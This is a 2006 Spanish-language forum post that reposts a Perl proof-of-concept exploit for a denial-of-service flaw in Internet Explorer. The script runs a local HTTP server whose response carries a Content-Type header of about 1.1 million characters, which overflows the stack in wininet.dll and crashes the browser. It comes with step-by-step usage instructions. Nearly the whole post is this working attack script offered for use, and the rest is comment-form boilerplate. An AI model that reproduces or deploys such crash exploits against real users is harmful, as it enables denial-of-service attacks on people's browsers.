Home

Microsoft Internet Explorer Content-Type Denial Of Service Vulnerability

Enviado por OeX el Lu, 24/07/2006 - 09:47.
#!/usr/bin/perl
# Stack overflow in wininet.dll while parsing huge( > ~1M) Content-Type response
# ex.: Unhandled exception at 0x771c00ee in IEXPLORE.EXE: 0xC00000FD: Stack overflow.
#
# discovered by Firestorm
#
# Usage:
# 1) run this code
# 2) open http://127.0.0.1/ with IE
#

use IO::Socket;
my $sock=new IO::Socket::INET (Listen => 1,
LocalAddr => 'localhost',
LocalPort => 80,
Proto => 'tcp');
die unless $sock;
$huge="A" x 1100000;
$|=1;
print ">http server started on port 80... try 'iexplore http://127.0.0.1/' ";
$z=$sock->accept();
print ">connection! ";
do
{
$ln=<$z>;
print $ln;
chomp $ln;

if (($ln eq "")||($ln eq " ")||($ln eq " "))
{
print ">sending response ";
print $z "HTTP/1.1 200 OK
Server: X3 1.0
Content-Type: $huge
Connection: close

done";
close($z);
exit;
}
} while (true);
  • 470 lecturas

Enviar un comentario nuevo

  • Saltos automáticos de líneas y de párrafos.
  • Allowed HTML tags: <a> <em> <strong> <cite> <code> <ul> <ol> <li> <dl> <dt> <dd> <img> <p> <br>
  • You may post code using <code>...</code> (generic) or <?php ... ?> (highlighted PHP) tags.

Más información sobre opciones de formato

CAPTCHA
This question is for testing whether you are a human visitor and to prevent automated spam submissions.
Image CAPTCHA
Copy the characters (respecting upper/lower case) from the image.